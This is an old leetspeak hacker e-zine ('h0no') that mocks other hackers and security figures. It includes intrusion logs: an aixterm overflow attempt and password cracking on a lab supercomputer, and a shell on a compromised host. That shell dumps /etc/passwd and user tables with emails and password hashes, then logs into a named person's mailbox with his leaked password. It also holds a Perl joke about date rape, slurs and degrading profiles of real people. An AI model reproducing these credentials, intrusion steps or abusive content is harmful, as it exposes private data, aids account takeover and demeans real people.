Nov 11 07:29 (mpm09.epm.ornl.gov) amgeorge pts/12 Nov 11 07:13 (taurus.ccs.ornl.gov) hof pts/13 Nov 16 21:15 (5664forrest.032.popsite.net) xu pts/14 Nov 12 19:33 (ashdown.llnl.gov) lts pts/16 Nov 11 07:58 (ca16.cad.ornl.gov) fperez pts/17 Nov 16 23:29 (littlewood.colorado.edu) reed pts/18 Nov 11 08:21 (rdu74-177-187.nc.rr.com) reed pts/19 Nov 11 08:22 (rdu74-177-187.nc.rr.com) schultzd pts/21 Nov 11 08:28 (cfadc05.phy.ornl.gov) reed pts/22 Nov 11 09:07 (rdu74-177-187.nc.rr.com) leonmal pts/24 Nov 11 16:16 (kermit.asci.uchicago.edu) $ uname -a AIX cheetah0033 1 5 00207D8A4C00 /* aightz!! letz root dis m0f0! */ $ cp /usr/bin/X11/aixterm ./test $ ./test -display x.x.x.x:0 -im `perl -e 'print "x" x 500'` 1363-009 aixterm: Cannot open font -*-roman-medium-r-normal--8-50-100-100-c-*-ISO8859-1. Check path name and permissions. Segmentation fault $ /* after doing some shit in gdb for a couple of hours i come to the conclusion that AIX sucks hairy cock. especially on supercomputers with all kinds of protection. no root. */ $ wget ftp://ftp.uu.net/tmp/john-dev-smp.tar.gz &> /dev/null $ tar xfz john-dev-smp.tar.gz $ cd john-dev-smp/src $ make aix-ppc-cc &> /dev/null $ cd ../run $ echo "mofo:ph5BNn5xY7nT6:12303::::::" > foosh $ nohup ./john -session:harhar foosh & /* mkayz letz g0 make sum chicken sandw1chez 5 min lator */ $ ./john -show foosh mofo:dar2be:12303:::::: 1 password cracked, 0 left $ exit exit that is all for now... to the hacking scene: keep things private plz kthx d0rknet sux. 04.txt-~-~-~ shcrew submits to h0no! Fr0m r34d1ng bx's 1nt3rn4l shcr3w m41lsp00lz w3 n0t1c3e th1s g3m 0f 3nt3rt41nm3nt! ------=_Part_155_11933234.1097102628393 Content-Type: text/plain; name="h0nohelln0.txt" Content-Transfer-Encoding: quoted-printable Content-Disposition: attachment; filename="h0nohelln0.txt" __ __ __ ___ ___ __ /\ \ /'__`\/\ \ /\_ \ /\_ \ /'__`\ \ \ \___ /\ \/\ \ \ \___ __\//\ \ \//\ \ ___ /\ \/\ \ \ \ _ `\ \ \ \ \ \ _ `\ /'__`\\ \ \ \ \ \ /' _ `\ \ \ \ \ \ \ \ \ \ \ \_\ \ \ \ \ \/\ __/ \_\ \_ \_\ \_/\ \/\ \ \ \_\ \ \ \_\ \_\ \____/\ \_\ \_\ \____\/\____\/\____\ \_\ \_\ \____/ \/_/\/_/\/___/ \/_/\/_/\/____/\/____/\/____/\/_/\/_/\/___/ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ uh 0hz. d0 eye sm3ll n3wb1es. HEHhehEHhehEh00h0h0h0h0h0h0h0h)H)h0h!!! @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ WELCUM TEW ISSYEW #1 VOLYEWM 29a OF HAX0R MAGAZINE! F3ATURING ARTICL3S FROM LANCE SPITZNER AND AN INTER- VIEW WITH THE INFAMOUS HAX0R LEET GROUP H0N0!!!!!!!! @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@ # TABLE OF CONTENTS FOR OVERLY EXCITED FARM ANIMALS IN THE BARNYARD! # # ------------------------------------------------------------------ # 01. INTERVIEW WITH THE HAXER GREWP h0no AKA h0m0 # 02. h0m0 MEMBERS LIST!?!?!?! # 03. HAXORLICIOUS EXERPTS FROM TERMINAL ZERO ###################################################################### ######## ######## ######## %####### %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% S C R O L L A G E %% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% S C R O L L A G E ~ ~ ~ ~ ~ %% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% vvvvvvvvvvvvv | | | | | /`````\ | | | | | | | | | | | | | | \_____/ | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | WHERE ARE THE KEEBLER | | ELVES???????????????? | | | | | | | | | | | | | | | | | | | | ~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^ ^~^~^~^~^~^~ 01: INTERVIEW WITH HAXER GREWP h0no AKA h0m0 BlAckHat: so'z, how Long have yew leet pplz been around? h0no: we'eve been around for about... like 1 week or so BlAckHat: do you guys have a motto? h0no: yes, "messing and threatening random people on earth" BlAckHat: interesting, and what are yu0r goals and recent acheivements? h0no: we wanna be the most eleet group on the planet. after being influenced by such movies as Hackers, Hackers 2: Takedown, Wargames, The Net, The Mangler, and magazines such as 2600, Hax0rTimes & lets not ferget the music of YTCracker and Ali G. BlAckHat: why the fux are u guys so leet??? h0no: berries, herbs, and several hours on waiting lines for cons. BlAckHat: so what were yuor recent hax attacksz? h0no: we'll recently we owned this group called nixsec, theyre a buncha lamers. but, really we didnt own them like 100%, our zine made it seem as if it did EAUHEUAHEUAHEUHAEUHAEUHAEUEHA~!!!! BlAckHat: so in other words, you guys are retarded? h0no: oh we're not retarded, we're just way too cool for school d00d hehehe BlAckHat: so how many members are in h0m, i mean h0no? h0no: ....1....2....carry the 4.... 3 :):)! BlAckHat: do you guys know how to code? h0no: of course, we are masters are the following languages: C, C++, Perl, VB, VBscript, Java, Javascript, Leetscript, Bash, VXcoding, MySQL, PHP, HTML, Python, COBOL, REBOL, Pike, .NET, ASM, uh and er Internet Coding. BlAckHat: you guys have NO idea how to code... do you? h0no: er *** 20 minutes later *** BlAckHat: you there? h0no: sorry we were taking over a bank! BlAckHat: right. anyway, next question BlAckHat: you have no idea how to code do you? it took you 15 minutes to count your members! h0no: FUCK YOU. ILL DOS U. h0no: * [BlAckHat] (BlAckHat@BlAckHat.666.asm) :=20 h0no: * [BlAckHat] @h0nohellno h0no: * [BlAckHat] irc.blackened.net h0no: * [BlAckHat] is an IRC Operator h0no: * [BlAckHat] End of WHOIS list. h0no: err... *** h0no has quit (Killed: fuq fac3) 02: h0no memb3rsh1p hELLO PPLZ. W3LC0M3 T0 AN0THER H0NOHELLN0 PROPHILE. T0DAY WEE WILL DOAN ELEET PROPHILE 0N NONE OTHER THAN h0no!! PeRSoNaL BIoGROpHrEaK ????????????????????? rEAL nAME: UNKNOWN hANDLE : nolife hANGS iN : #darknet nATIONAL : rUSSIAN sPEAKS : eNGlish & rUSSIAN lOCATION : bROOKLYN, nEW yORK iSP : vERIZON DSL sKILLS : hEXING wINDOWS bINARIES FaMiLy MaTtErS ????????????????????? mOTHER : UNKNOWN mOMs jOB : pROSTITUTE/wAITRESS/eXOTIC dANCER fATHER : n3td3v dADs jOB : pORNOGRAPHER/pART-tIME sALES mOMs aGE : 58 dADs aGE : 67 sIBLINGS : 2 dECEASED bROTHERS * jOEY * rICKY eDuCaTiOnAl sTaTiStiCz ?????????????????????? sCHOOLIN : nEVER pASSED hIGHSCHOOL jOb 'N cArREErZ ?????????????????????? cURRENT : mOTHERS pIMP / cASHIER (mCdONALDS) h0m0 MEMBERS LIST!?!?!?! > Begin ultra phucking secret msg... > SH MSG05.1_ ./ \/ /.......h0no organisation \/\ / .......memb3rz list..... \\/ w3 kn0W y0U kiDz 0n Z0n3-h(Pr0PZ!) l0v3 T0 pl4Y p4Zz th3 P4rC3l w1tH h0mo m3mb3rZ s0 w3 th0UghT w3 w0uLd sp1Ll th3 b34Nz s0 w3 c4n r3c13v3 s0m3 DdoZ! CEO.............. bx SECRATARY........ dvdman (sw4lL0Wz!) VICEPREZ......... harq ACCOUNTS......... divineint PUBLISHING....... so1o RECREATION....... nolife ALTEREGOS........ GOBBLES SUPERHEROS....... r4tman ENTERTAINMENT.... route MORNINGWOODCLONE. n3td3v PACKETINJECTOR... SLY n0w y0U kn0W wh0 w3 4r3 Pl34Ze Msg uZ t0 G3t Gr33tZ&&DDoZD!!~! If y0u d0Nt HaV3 A g00D P4ck3T3r MsG SLY FoR h3lP ASaP!!! > ECHO "DORKZ"_ DORKZ ^&"@$&£%!"£^24####.. NO CARRIER 03: HAXORLICIOUS EXERPTS FROM TERMINAL ZERO HOI. MY NAYMES STEEV ERWIN. AND TODAI WE'RE GONNA CHECK OUT THE RARE AND LAYME ANIMAL KNOWN DAWN UNDAH AS THE SCRIPT KIDDIE. NOW, LETS SEE SOME ACTION AS THUH SCRIPT KIDDIE TROIS TO ATTACK ROSEC SECURITAY: 81.185.144.33 - - [13/May/2004:18:02:20 +0300] "GET /mailman/confirm/rosec/bb12581fc16c323714d13903b5128441b4e4eef8 HTTP/1.1"$ CRAWKIE! THATS SOME ACTION RYTE THERE! UH OH. WE BETTAH RUN BEFORE IT GETS ANGRAY AND ATTACKS US!! RUN!! ------=_Part_155_11933234.1097102628393-- 05.txt-~-~-~ perlsex [aka. how to get laid] #!/lose/ur/virginity # # h0no c4n c0de. # # greetz to zone-h forum for the help!!! #g0t t0 f1nd m3 a l4dy... $lady = 'drunk' if(open(GIRL, '/usr/bin/pub')); $lady = 'slut' if open(BITCH, '/home/street/corner')&&use protection; #th1z alw4yz w0rkz. chomp my $dick = () unless $lady ne 'slut'; if(!($dick exists in @mouth)){ #sh3's just pl4y1ng h4rd t0 g3t. print GIRL "my what nices eyes you have.."; if(<> eq 'all the better to glar into your eyes while I'. 'stroke you off'){ $lady = 'slut'; $pants = 'off'; foreplay(); } } #w41t t1ll sh3 g3tz a l04d 0f th1z! print GIRL '8==========\n=========\n=====D'; #th4tz wh4t 3y3 th0ught b1tch. if(($face = <>) eq '8D'){ sex($lady, 'in car'); } elsif(($responce = <>) eq 'ive seen bigger'){ $lady = 'pornstar'; use camera; sex($lady, 'out_side'); } #FUCK Y0U B1TCH! else{ open(D13B1TCH, ">date/rape") || kill $lady; print D13B1TCH $roofie; } sub sex{ ($lady, $location) = @_; # /##\ <-- sup3r h0no ascii sk1llz goto CAR if ($location =~ /()-()>/); #(itz a c4r y0u fuckz) goto OUTSIDE if ($location =~ / /); else{ print "s3x h3r3?????\n"; $lady = 'superfreakyslut'; } #fuck th1z b1tch sleep $with_her; exit; CAR; #g0t t0 g3t 4t th4t pussy! open(DOORS, 'side/of/car') or chop($window) if $desperate; OUTSIDE; ($thing, $todo) = foreplay(); if($todo eq 'to party'){ exit; } else{ @positions = (6,9); #g0 nutz sort(@positions); foreach(@positions){ #sin until your done. $done = sin($_) until $done; } exit if($done); else{ #sw1tch p0s1t10nz 4nd h1t th4t pussy. reverse(@positions); &sex($lady, 'here'); } } sub foreplay { open(INTERESTINGSTUFF, "below/head/above/vigina") or `unzip dress*`; #3y3 l0v3 t1tz ($shirt, $bra, $boobs) = ()[0..2]; #H3y h0n, 3y3 th1nk 3y3 n0t1c3d y0u 4r0und if(exists($shirt)){ #S0rry 4b0ut s4l4d cr34m, 3y3 d1dn't kn0w #1t c4m3 0ut l1k3 th4t #1t'll b3 w4sh3d 1n a j1ffy open(SHIRT, "cute-silk-number"); #H3y b4b3, w4nn4 kn0w wh4t l00kz g00d 0n my fl00r? unlink($bra . $one_hand); #s41n1ty ch3ck if (!exists($boobs)){ #0h g0d fuck m3, TH4TS why h1s 4ss h0l3'z r3d! alarm(1); print STDOHSHIT "ITZ A MAN!GOATSECX ALEERRTT"; close(SHIRT) && die; } #th3y'r3 m1n3 n0w! my $boobs; study $boobs; #th3y n33d a t41nt ch3ck? $hands = ($boobs =~ /(.)(.)/); #4ll th3m sm4ll th1ngz add t0 p3rf3ct10n while ($boobs =~ s/.*(nipple|raised_area|tatoo).*/g) { $sensations .= $1; } seek BOOBS, $sensations,0; return($sensations, 'done'); #1f $sh1rt d03sn't ex1st } else{ $her = 'drunk'; while(not exists($seman)){ $you = pack 'CU','NT'; } return($her,'to party'); } } } 06.txt-~-~-~ Exploit Modelling and Generalization 2 --[ Exploit Modelling and Generalization 2 --[ Introduction y0 dudez, easy to use exploitz have been rolling for what seems like months now, and many of the elitez making these things dont spend enough time and need to do more coke. Most of the time exploitz use variations on the same command line arguments most of the time. Even if we accept this as 'elite', h0no sees that the elitez are making exploitz from scratch time and time again, and the same sort of command line options and offsetz are used most of the time. the impact of this has two sides, first all of the zone-h kidz are able to pick up an exploit, compile it, and use it within seconds. This paper tries to generalize exploitation principles and also strives to build a formal exploitation optionz model for use in remote root and local gid gamez exploitz. --[ In the beginning there was... In order to try to generalize exploit principles it would come in handy to use a drugged-up approach, in other words, we will first do a line of coke and then run the daily packetstorm shit. Obviously, the most easy case to be described in our new mindset is the remote root. When looking into these types of exploits the first stricking thing that clubbers a lot of exploit command line optionz is the way in which offsetz and other pointless thingz to ./ kidz are used. A lot of elitez try to prove their intellegence by making their code use some hexacecial encoding or whatever the fuck itz called for offsetz. This is not truly a problem, but it gets more nasty to convert these if you haven't ./statdx a few boxes. The next striking thing is that the 'offset' and get_sp() principle is still used far to often. First of all one can be wondering why the get_sp() function was introduced - Linux basicly has no reason for this, so let's move on. The usefull part of an exploit is the ./ effect. I asked an elite, and he said the environment starts out at a known fixed base, and knowing this it is easy to make an exploit without any command line options. This technique still suffers from fluctuations in the coke, depending on how many linez there are (ie. closer to the elitez nose). If they make sure that the coke is going to be the first entry in the brain, elitez can stay up for dayz and dayz coding. Exploitz will get to the point of no command line optionz, and the kidz can use them without wasted time. Combining all this we could write the most simple form of a remote root exploit command line as follows: [h0no@localhost]# ./h0-urfuckd pivx.com [owned] pivx.com [root@pivx.com]# The idea of being able to ./ without options comes in truly handy in many different situations. Especially when needing to own many whitehats very quickly. This is the key element to successfull exploitation. --[ local gid gamez A bit harder to model than it's ancient god-father, the remote root, but certainly more interesting. The general concept of the local gid gamez exploit is to win at gnu chess. Since no one in h0no can do this, we decided to leave this up to the elites on vuln-dev. Exploitz to come. -- scr1bbl3/ronaldmcdonald@grafix.nl 07.txt-~-~-~ d4nc3 d4rkcub3, d4nc3 n0t s1nc3 th3 gr34t 0wn1ng 0f udp's l1v3j0urn4l h4s 4 bl0g b33n h1t lyk3 th1s. 4 l1ttl3 1ntr0 m4y b3 n33d3d.. d4rkcub3 w4s 4 c0r3 m3mb3r 0f h0no dur1ng th3 m4k1ng 0f h0no1, but s1nc3 th3n h4s b33n b0mb4rd3d w1th sh0wz t0 d0.. s0 h3 h4d t0 t4k3 s0m3 t1m3 4fk. Th1s 1s n0t t0ll3r4bl3, s0 fr0m th1s d4y f0rth d4rkcub3 1s n0 l0ng3r 4ll0w3d 0n th3 ircsn3t 0r t0 r34d futur3 1ssu3z 0f h0no (n0t3: th31r w1ll n0t b3 4ny). fr0m http://www.livejournal.com/users/darkcube/59902.html -~-~-~ darkcube ([info]darkcube) wrote, @ 2005-04-13 16:03:00 Previous Entry Add to memories! Next Entry not to be trusted. yo, i'm at war right now. the following accounts have been compromised, and are not to be trusted : AIM : el8haqr AIM : darkcub3 ravematch : darkcube hotmail/MSN : djdarkcube@hotmail.com midnb : nexxus yahoo : d4rkcub3@yahoo.com YIM : d4rkcub3 stay tuned for the update. -~-~-~ w3 w0uld lyk3 t0 th4nk d4rkcub3 f0r ush3r1ng 1n 0ur l4st3st 1ssu3 0f h0no. th3 w4r 1s 0v3r m4n, but th4nkz f0r th3 h3lp! v1s1t DJ D4rkCub3 1n d3tr01t, th3 murd4h c1ty, @ th3 b0ng0 b0ng0 l0ung3. S4turd4y n1ghtz h4ck3rz dr1nk fr33. 08.txt-~-~-~ bhs-authkeys h4s a c4s3 0f th3 buff3r 0v3rphl0wz h0no advisory ------------------------------------------------ ------------------------------------------------ Software: bhs-authkeys Date of discovery: t00 st0n3d t0 r3m3mb3r Risk : sup3r dup3r w00p3r l0w, ( wh0s g0nna us3 d1z sh1tty c0d3 ) Platform: y3n1x Type of bug(s): 4 sh1tl04d 0f 0v3rphl0ws Vendor notified : c0uldnt m3ss4ge v3nd0r s1nze n0 0ne 1z 0wning up t0 c0d1ng such cr4p Description ----------- st4rt 0f l4m3 h34d3r.... /* bhs-authkeys.c description: code made incase admins log commands, if you dont know what "authkeys are for" dont use it! author: hex @ #BlackHats - Efnet featuring bx greets: pintos, termid, eksol, grass, atomix, tiggy, jinksed, c0n, dvdman, BSDaemon, d4rkgr3y, lacroix worm, BoR0, knowfx, Nas`, Abunasar, harq and others we've forgot ;) url: http://blackhats.uni.cc */ //coded by hex blackhats@efnet 3nd 0f l4m3 h34d3r.... up0n 4n 4ud1t 0f bhs-authkeys t00l , h0no h4s b33n 1nf0rm3d 0f mult1pl3 buph3r 0v3rphl0ws 1n th1z s0ftw4r3 wh1ch c4n l34d t0 4rb1t4rty c0d3 3x3cut10n. Us3rs 4r3 str0ngly 4dv1s3d t0 qu3st10n th3r3 s4n1ty 4z t0 why 0n g0ds gr33n 34rth 4r3 th3y us1ng th1z s0ftw4r3 wh1ch 4pp34rs t0 h4v3 b33n f4rt3d 0nt0 n0t3p4d 4nd c0mp1l3d. th3 4ud1t b3l0w w4s 3m4l13d t0 uz by h3l3n k3ll3r 4ft3r sh3 d0wnl04d3d 4 c0py 0f bhs-authkeys 4nd th3n pr0c33d3d t0 sh0w uz h3r f1nd1ngs. n1ce j0b h3l3n :D .:::::. Deya h0no , aigh lub yoh zine awwlot an aigh jus wanah sey that aigh'm gibbing m'aigh cuntribushun tu yew bois. heeyah ees wah wah wah aigh fownd een bhs-authkeys: soom boofr ohvahfloors ahnd soom voolns. bhs-authkeys.c -------------- Line: 101 Function: "sprintf()" sprintf(syscmd ,"%s/.ssh", homedir); //wah wah wah a stewpid theng tu dew eef wee luk at da mayn() fooncshan wee weel see: int main(void) { FILE *f; char string[1024]; char syscmd[2048]; <------ startic boofr char key1[2048]; char key2[2048]; char buf[2048]; int key1present = 0,key2present=0; char *homedir; homedir = getenv("HOME"); <------ hoh shyt deya h0no thees ees ah stark ohvahfloor,wah wah wah woz da kohda theenkan! bhs-authkeys.c -------------- Line: 107 Function : "sprintf()" sprintf(syscmd, "mkdir %s/.ssh", homedir); aigh fownd wun heeya az well arnd... Line: 110 Function : "sprintf()" sprintf(syscmd, "%s/.ssh/authorized_keys", homedir); // hohlee shyt moh.. Line: 116 Function : "sprintf()" sprintf(syscmd, "touch %s/.ssh/authorized_keys", homedir); yohn...moh Line: 119 Function : "sprintf()" sprintf(syscmd, "%s/.ssh/authorized_keys", homedir); blar blar blar....moh Line: 148 Function : "sprintf()" sprintf(syscmd, "touch -r /bin/ls %s/.ssh/authorized_keys", homedir); eef dat eesnt laym yuze owv sprintf() arnd mees uze owv getenv() theyn m'aighkul jehkzan ees ah zand neegur bhs-authkeys ees plegged wuth moh een sekyooritties: Line No: 108 Function: "system()" system(syscmd); //ho shyt eef wee tarace dee syscmd bach wee see : sprintf(syscmd, "mkdir %s/.ssh", homedir);//wah wah wah a stewpid theng ez yew carn see wee carn cuntroll dee syscmd. dat feeneshez m'aigh owdit , aigh joost wohna seh dat joost coos aigh'm bulleyend , doomb arnd deyf doozant stowp meh frowm fyndeen boogs in yoh kohd. wowtch owt laymaz coos kurazy helen ees boorstin on dee seen. aigh'm heya tu mayk yoh loif hill! gudb'aigh h0no , lub yew owl xx Helen "mac-daddy" Keller. .:::::::. wh4ts th3 p0int 0f us sh0w1ng y0u m0r3 0f th1s l4m3 c0d3 wh3n 1t w0uld b3 m0r3 fun thr0w1ng 3l3ph4nt dung 4t y0u. thx 4 bunch t0 h3l3n , 0ur n3w sp1r1tu4l l34d3r. th4t c0nclud3s th1s 4dv1s0ry fr0m h0no. th3 0nly th1ng l3ft t0 d0 iz /qu3ry hex_ @ efnet 4nd t3ll h1m t0 "man snprintf", 0h 4nd wh1l3 y0ur 4t 1t t3ll h1m h3l3n k3ll3r pwn3d h1z l4m3 c0d3 4ll th4t r3m41ns n0w 1z f0r t4l0n` t0 c0d3 th3 p()c th3n tr4d3 h1z n3w w4r3z. PS: thnx t0 b0f f0r sh0w1ng h3l3n h0w t0 uz3 fl4wf1nd3r 09.txt-~-~-~ thor the milf hunter pivx sucks, but thor's admining another more interesting site. Purhaps he should quit security and get into his other hobbies. sh-2.05b$ uname -a Linux box4.just-hosting.com 2.4.21-27.0.2.ELsmp #1 SMP Wed Jan 12 23:35:44 EST 2005 i686 i686 i386 GNU/Linux sh-2.05b$ cat /home/jscript/.bash_history ls prompt l. cd .trash/ ls l. cd .. less .spamkey less .bash_history rm .bash_history ls l. cd .gnupg/ ls ll add_members locate mailman cd / ls cd opt ls cd .. cd misc ls cd .. cd usr/local/ ls cd share/ ls cd man ls cd .. cd .. ls ls bandmin/ ls apache/ ls apache/cgi-bin/ ls apache/man/ ls apache/conf cd apache/conf ls ll less httpd.conf ls /home/mailman ls ~ ls ~pubmp3o/ ll ~ ls ~/public_html/ ls ~/public_html/lists/ echo "ServerName lists.jscript.dk" echo "ServerName lists.jscript.dk" > ~/public_html/lists/.htaccess rm ~/public_html/lists/.htaccess host 216.177.27.37 dig 216.177.27.37 telnet home.jscript.dk telnet home.jscript.dk 123 cd ~ ls l. echo "ls" > .bash_history ls ll less .bash_history dns mx word-to-the-wise.com dig mx word-to-the-wise.com dig mx2.samspade.com host mx2.samspade.com ping mx2.samspade.com nmap exit ls top cls clear l. telnet lynx jscript.dk exit ls l l. cd .. ls l. cd / ls cd ~ ls dig host ls cd www ls exit ls mkdir bin cd bin ls l. ll wget http://download.insecure.org/nmap/dist/nmap-3.70.tar.bz2 locate nmap ls bzip2 -cd nmap-3.70.tar.bz2 | tar xvf - cd nmap-3.70 ./configure make ls nm* nmap ./nmap cp ./nmap ../ cd .. ls cd ~ ls cd bin nmap ./nmap ./nmap home.jscript.dk nmap -v -v home.jscript.dk ./nmap -v -v -P0 home.jscript.dk ping home.jscript.dk telnet msn.com 80 nmap ./nmap ./nmap -sU home.jscript.dk ./nmap -sn home.jscript.dk ./nmap -6 home.jscript.dk ./nmap pivx.com clear nmap -v -v home.jscript.dk ./nmap ./nmap -v -v home.jscript.dk telnet home.jscript.dk 1 telnet home.jscript.dk 21 telnet jscript.dk 22 dfb telnet home.jscript.dk 22 rm nmap ls rm -rf nmap-3.70 ls rm -rf nmap-3.70.tar.bz2 ls l. ll clear clear exit sh-2.05b$ echo boring boring sh-2.05b$ grep bash /etc/passwd root:x:0:0:root:/root:/bin/bash netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash mysql:x:100:101:MySQL server:/var/lib/mysql:/bin/bash cpanel:x:32001:32001::/usr/local/cpanel:/bin/bash mailman:x:32002:32002::/usr/local/cpanel/3rdparty/mailman:/bin/bash mydomain:x:32011:32012::/home/mydomain:/bin/bash astille:x:32074:32075::/home/astille:/bin/bash cedarpa:x:32079:32080::/home/cedarpa:/bin/bash fantasti:x:32086:32087::/home/fantasti:/bin/bash itechnet:x:32093:32094::/home/itechnet:/bin/bash jscript:x:32095:32096::/home/jscript:/bin/bash madison:x:32099:32100::/home/madison:/bin/bash pubmp3o:x:32117:32118::/home/pubmp3o:/bin/bash scottish:x:32121:32122::/home/scottish:/bin/bash warsims:x:32133:32134::/home/warsims:/bin/bash tomcat:x:101:99::/home/tomcat:/bin/bash asdf:x:32137:32138::/home/asdf:/bin/bash allfiles:x:32144:32145::/home/allfiles:/bin/bash axtelsof:x:32148:32149::/home/axtelsof:/bin/bash calabas:x:32151:32152::/home/calabas:/bin/bash jakesli:x:32175:32176::/home/jakesli:/bin/bash lioutra:x:32179:32180::/home/lioutra:/bin/bash screwbal:x:32193:32194::/home/screwbal:/bin/bash snserver:x:32194:32195::/home/snserver:/bin/bash thetrav:x:32199:32200::/home/thetrav:/bin/bash sh-2.05$ cat ev3rw4nt24dm1nblog.jscript.dk\?.sql INSERT INTO b2users VALUES (1,'larholm','abekat','Thor','Larholm','Jumper',0,'thor@jscript.dk','','127.0.0.1','127.0.0.1','','0000-00-00 00:00:00',10,'','','','nickname'); sh-2.05$ cat th0rzs3cr3tp0rns1t3z.sql INSERT INTO nuke_message VALUES (1,'Welcome to OCMILF.COM - home of the MILF','OCMILF.COM is your one stop resource for all that is MILF!\r\n

\r\nLive from the birth place of the MILF, Orange County in southern California, we bring you everything that you need to satisfy your MILF hunger\r\n

\r\n

    \r\n
  • MILF articles\r\n
  • MILF background information\r\n
  • MILF pictures\r\n
  • MILF personals \r\n
  • MILF testimonials\r\n
\r\n

\r\nHave you ever wondered what makes a MILF tick?\r\n
\r\nAre you a MILF looking for that young stud to appreciate you and brighten your day? \r\n
\r\nAre you a MILF lover looking for that special MILF in your neighborhood?\r\n
\r\nAre you looking for the latest MILF news and developments on the MILF scene?\r\n

\r\nIf so, you have come to the right place! At OCMILF.COM we strive to be your one stop resource for all that is MILF','993373194',0,1,1,''); INSERT INTO nuke_users VALUES (1,'','Anonymous','','','','blank.gif','1085693158','','','','','',0,0,'','','','',10,'',0,0,0,'',0,'','',4096,0,12.0); INSERT INTO nuke_users VALUES (2,'larholm','larholm','ocmilf@jscript.dk','','http://ocmilf.com/','blank.gif','1085693158','','','','','',0,0,'','','','3301f5262143eacd30b9e9e09478146b',10,'',0,0,0,'',0,'','',4096,0,12.0); INSERT INTO nuke_users VALUES (3,'','renenielsen','mailliste@renenielsen.net','','','blank.gif','1086399461','','','','','',0,0,'','','','ed8bd54dcc5c37d09cad1c3994d2ba5e',10,'',0,0,0,'',0,'','',4096,0,4.0); INSERT INTO nuke_users VALUES (4,'','gloke','georgerodriquez@yahoo.com','','','blank.gif','1087340033','','','','','',0,0,'','','','96f367f2c0eaba69c8715e930dbd3a39',10,'',0,0,0,'',0,'','',4096,0,4.0); INSERT INTO nuke_users VALUES (5,'','newporter','bbogus@aol.com','','','blank.gif','1096435048','','','','','',0,0,'','','','ac9f29b8a41f0807c524d47a0d6c0616',10,'',0,0,0,'',0,'','',4096,0,4.0); INSERT INTO nuke_users VALUES (6,'','josephpro','rodney747@go.com','','','blank.gif','1100104712','','','','','',0,0,'','','','489d57a53776caf141fe5237e41f9f86',10,'',0,0,0,'',0,'','',4096,0,4.0); INSERT INTO nuke_users VALUES (7,'','tonygmiller','tonygmiller@yahoo.com','','','blank.gif','1100938721','','','','','',1,0,'','','','2156ae4d826ef07e7c858c17fec31573',10,'',0,0,0,'',0,'','',4096,0,4.0); INSERT INTO nuke_users VALUES (8,'','howiii','hperkiii@msn.com','','','blank.gif','1103101822','','','','','',0,0,'','','','d7274db776806e704e47d0d27789fcbf',10,'',0,0,0,'',0,'','',4096,0,4.0); INSERT INTO nuke_users VALUES (9,'','trev186','mycouch186@hotmail.com','','','blank.gif','1105090092','','','','','',1,0,'','','','17d8c37ede6453acc82201d5d284bbf8',10,'',0,0,0,'',0,'','',4096,0,4.0); sh-2.05$ echo buhahahaha buhahahaha sh-2.05$ telnet jscript.dk 110 Trying 70.84.109.20... Connected to jscript.dk. Escape character is '^]'. +OK POP3 box4 [cppop 18.1] at [70.84.109.20] user thor@jscript.dk +OK Need a password PASS abekat +OK You have 45 messages totaling 1048421 octets from /home/jscript/mail/jscript.dk/thor/inbox (quick cache v9) retr 1 +OK 43884 octets th@z a wrap. 10.txt-~-~-~ Incerptz from Deception Magazine sneek preview of the soon to be world's most feared zine! atomix@achilles atomix $ cat deception-v01.txt _____________________________________________________________ |********************* Deception Magazine ********************| /(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)\ ---------------------------------------------------------------- [########################################## VERSION [01] /|\ 01/01/05 #################################################] "A blackhat magazine so good that even Bill and Linus want a copy!" [########################################## VERSION [01] \|/ 01/01/05 #################################################] **************************************************************************************************************************** ,..______+______.., [TABLE OF CONTENTS] '..------+------..' 1. Introduction 2. Exploits/Flaws 2.1 ProFTPd/SSHd local file reading 2.2 XChat command line overflow 3. Traveling through networks 3.1 Owning one box leads to another 3.2 Watching out for admins 3.3 Searching for the gold 4. Current Events 4.1 SCO gets defaced. Again. 4.2 Samba 4: Miracle or Mayhem? 4.3 IE Flaws for LIFE 4.4 FED's tapping VoIP? 5. OS Reviews 5.1 OpenBSD 3.5 5.2 QNX 6.2.1 5.3 Slackware 10 5.4 Solaris 9 (x86) 6. Security Corner 6.1 grSEC 6.2 LibSafe 6.3 md5sum 7. Some topic we need to think of. 8. Deception Magazine 411 9. The Author's Cut 10. Outroduction **************************************************************************************************************************** 1. Hello fellow blackhats, it is us, the spreaders of underground truth, the writers of educational hacking literature, the people that decided to write a cool magazine for our all the *dark* hackers out there... it is none other than the staff of "Deception Managzine", a good little zine about undergroud exploits, flaws, rumors, current happenings, hacking, traveling through networks and more! Now, by reading this magazine, you agree that you cannot share any of the information contained in this zine to any non-blackhat hacker, programmer, etc, and that you are also not affiliated with any government agency or just a plain 'ole whitehat. Agree? Good, on with the zine! **************************************************************************************************************************** 2. Yeah.. in this section we will share some information on flaws that have been discovered and not been reported, otherwise known as "0days" =). **************************************************************************************************************************** H0ly sh1t!! G3t r34dy t0 f34r 0n j4n 1st! 11.txt-~-~-~ th3 h0no gu1d3 t0 g3tt1ng bust3d - h0no h3Lp m3 I'm gr0Unded! - s0on3r 0r l4t3R iN y0Ur bl4ckH4t l1f3 y0U w1lL b3 gr0uNd3d bY p0l1c3. As c0re h0no staff r3c3ntly waZ det41n3d, h3r3 iZ 0uR gu1d3 t0 G3tt1Ng arR3zt3d!!!! iTz 7am 4nD y0Ur sl33PiNg iN b3d 4ft3r a L0ng w33K of h4x0RiNg anD tr4d1nG mp3 0N eMUl3, 